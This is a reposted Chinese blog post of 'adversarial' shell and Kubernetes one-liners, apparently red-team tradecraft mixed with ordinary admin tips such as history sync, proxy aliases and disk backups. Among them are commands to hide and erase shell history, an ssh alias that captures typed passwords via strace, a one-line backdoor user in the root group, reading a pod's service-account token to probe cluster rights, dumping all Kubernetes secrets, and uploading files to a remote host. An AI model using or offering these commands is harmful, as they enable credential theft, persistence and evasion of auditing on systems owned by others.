对抗小技巧: 一些实用的运维命令
2024-6-22 15:25:53 Author: mp.weixin.qq.com(查看原文) 阅读量:0 收藏

本来只是打算发几条实用命令,字数太少了干脆从笔记里面随便再捞几条放进来凑数2333

命令补全

  1. iterm2 + zsh + autosuggestions

多终端历史命令同步

指定zsh写入的历史命令的路径,配合autosuggestions实用,对设备多的人来说非常实用

  1. #历史命令的

  2. HISTFILE="$HOME/Library/Mobile Documents/com~apple~CloudDocs/zsh/.zsh_history"

  3. #记录历史命令条数

  4. HISTSIZE=100000

  5. SAVEHIST=100000

  6. setopt appendhistory

同样的 $HOME/.ssh/$HOME/.kube/一类的文件夹也可以配置自动同步

隐藏命令记录

入门

  1. set +o history

进阶

  1. export HISTFILE=/dev/null

高级

  1. unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

清除指定行历史命令

清除540行到566行。

  1. for h in $(seq 540 566 | tac); do history -d $h; done; history -d $(history 1 | awk '{print $1}')

代理切换

alias(别名) 非常实用

  1. alias proxy="export ALL_PROXY=http://127.0.0.1:8080"

  2. alias noproxy="export https_proxy= http_proxy= all_proxy="

  3. alias ips="export all_proxy=\"socks5://xxxx:xxxx@proxypool:80\""

替换jenv:

  1. alias jdk6="export JAVA_HOME=/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home"

  2. alias jdk7="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home"

  3. alias jdk8="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_151.jdk/Contents/Home"

  4. alias jdk9="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-9.0.4.jdk/Contents/Home"

  5. alias jdk10="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-10.0.2.jdk/Contents/Home"

  6. alias jdk11="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-11.0.1.jdk/Contents/Home"

  7. alias jdk12="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-12.0.1.jdk/Contents/Home"

  8. alias jdk13="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-13.jdk/Contents/Home"

  9. alias jdk14="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-14.0.1.jdk/Contents/Home"

  10. alias jdk15="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-15.jdk/Contents/Home"

禁止HOMEBREW自动更新

避免brew安装/更新程序是自动更新其他程序

  1. export HOMEBREW_NO_AUTO_UPDATE=true

二进制程序统一管理

所有编译好的工具可以统一丢到这目录,无需在alias去链接程序绝对路径,同样也可以配置iCloud自动同步。

  1. export PATH=$PATH:/Users/$HOME/tools/bintools/

当前IP查看

内外网ip

  1. ip(){

  2. echo -e "\e[32m[+] 内网:\e[0m"

  3. ifconfig|grep "inet "|awk -F ' ' '{print $2}'

  4. echo -e "\n\e[31m[+] 公网:\e[0m"

  5. curl cip.cc -s | tr -s '\n' '\n'

  6. }

  7. ip

文件备份1

  1. cd /tmp

  2. wget https://gosspublic.alicdn.com/ossutil/1.7.13/ossutil64 -O hulk

  3. chmod +x hulk

  4. echo "你的配置"|base64 -d > /tmp/.hulk

  5. ./hulk -c /tmp/.hulk cp /hulk.zip oss://xxxx/hulk.zip

  6. rm -rf /tmp/.hulk

文件备份2

curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'

  1. ~ cat upload.py

  2. from flask import Flask, request

  3. app = Flask(__name__)

  4. @app.route('/upload', methods=['POST'])

  5. def upload():

  6. file = request.files['file']

  7. if ".." in file.filename:

  8. return 'fuck u'

  9. else:

  10. file.save(file.filename)

  11. return 'File saved successfully'

  12. if __name__ == '__main__':

  13. print("curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'")

  14. app.run(debug=True, host='0.0.0.0', port=58000)

linux整机备份

备份

  1. dd if=/dev/vda of=/path/to/backup.img bs=4M

还原

  1. dd if=/path/to/backup.img of=/dev/vda bs=4M

备份到远程

  1. dd if=/dev/vda bs=4M | gzip -c | ssh root@xxxx "cat > /tmp/xxx_backup.img.gz"

还原:

  1. gunzip -c xxx_backup.img.gz > xxx_backup.img

  2. dd if=xxx_backup.img of=/dev/vda bs=4M

docker备份

  1. 所有的

  2. docker ps -a --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash

  3. 仅在允许的

  4. docker ps --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash

判断存在指定文件的docker容器

  1. docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /home/s/www/xxxx.png ] && echo "$1" has this file"}' | sh

  2. trantor-fe has this file

  3. docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /lib/ld-musl-x86_64.so.1 ] && echo "$1" has this file"}' | sh

无netstat看网络连接

单项

  1. grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){

  2. ret = 0

  3. n = length(str)

  4. for (i = 1; i <= n; i++) {

  5. c = tolower(substr(str, i, 1))

  6. k = index("123456789abcdef", c)

  7. ret = ret * 16 + k

  8. }

  9. return ret

  10. } {x=hextodec(substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."hextodec(substr($2,i,2))}{print x":"hextodec(substr($2,index($2,":")+1,4))}'

双向

  1. awk 'function hextodec(str,ret,n,i,k,c){

  2. ret = 0

  3. n = length(str)

  4. for (i = 1; i <= n; i++) {

  5. c = tolower(substr(str, i, 1))

  6. k = index("123456789abcdef", c)

  7. ret = ret * 16 + k

  8. }

  9. return ret

  10. }

  11. function getIP(str,ret){

  12. ret=hextodec(substr(str,index(str,":")-2,2));

  13. for (i=5; i>0; i-=2) {

  14. ret = ret"."hextodec(substr(str,i,2))

  15. }

  16. ret = ret":"hextodec(substr(str,index(str,":")+1,4))

  17. return ret

  18. }

  19. NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp

Linux一条命令添加用户

  1. useradd -`openssl passwd -1 -salt 'salt' P@ssw0rd` ibm2 --0 -g root -G root -/bin/bash -/home/guest

ssh密码备份

  1. alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

查看sa权限

  1. cd /run/secrets/kubernetes.io/serviceaccount/

  2. curl --cacert $PWD/ca.crt --header "Authorization: Bearer $(cat $PWD/token)" -H 'Content-Type: application/json' -i -s -k -X 'POST' --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}' https://$KUBERNETES_SERVICE_HOST:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews

etcd备份

  1. etcdctl --endpoints=http://xxxx:2379 snapshot save sec.db

k8s备份

  1. kubectl get namespaces -o name > namespaces.txt

  2. kubectl get all --namespace=default -o yaml > default-namespace-resources.yaml

  3. kubectl get clusterroles -o yaml > clusterroles.yaml

  4. kubectl get clusterrolebindings -o yaml > clusterrolebindings.yaml

  5. kubectl get deployments --all-namespaces -o yaml > deployments.yaml

  6. kubectl get configmaps --all-namespaces -o yaml > configmaps.yaml

  7. kubectl get secrets --all-namespaces -o yaml > secrets.yaml

  8. kubectl get pods --all-namespaces -o yaml > pods.yaml

  9. kubectl get serviceaccounts --all-namespaces -o yaml > serviceaccounts.yaml

  10. kubectl cluster-info dump > cluster-info.log

查找高权限sa

  1. kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.serviceAccountName}{"\t"}{.spec.nodeName}{"\n"}{end}'

kubectl安装

  1. curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

  2. chmod +x ./kubectl

  3. mv ./kubectl /usr/local/bin/k

  4. k auth can-i --list

最近创建的pod

  1. kubectl get pods -A --sort-by=.metadata.creationTimestamp

命令执行不出网

  1. Windows

  2. for /f %i in ('dir /s /b e:index.js') do (echo %i> %i.test.txt)%26(ipconfig > %i.ipconfig.txt)"

  3. linux

  4. find / -name index.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done

ssh端口转发

  1. ssh -L 本地端口:目标主机:目标端口 uesr@host [-N]

  2. ssh -L 5432:192.168.60.110:5432 sysadm@192.168.60.110 -p 2222


文章来源: https://mp.weixin.qq.com/s?__biz=Mzg5ODE3NTU1OQ==&mid=2247484367&idx=1&sn=170df37e51e6619b3d25e4fc5b598337&chksm=c067c4e7f7104df1ec3f8579e31b68e8d9cd65977f848b17f39348d74625a4672c4844a6be35&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh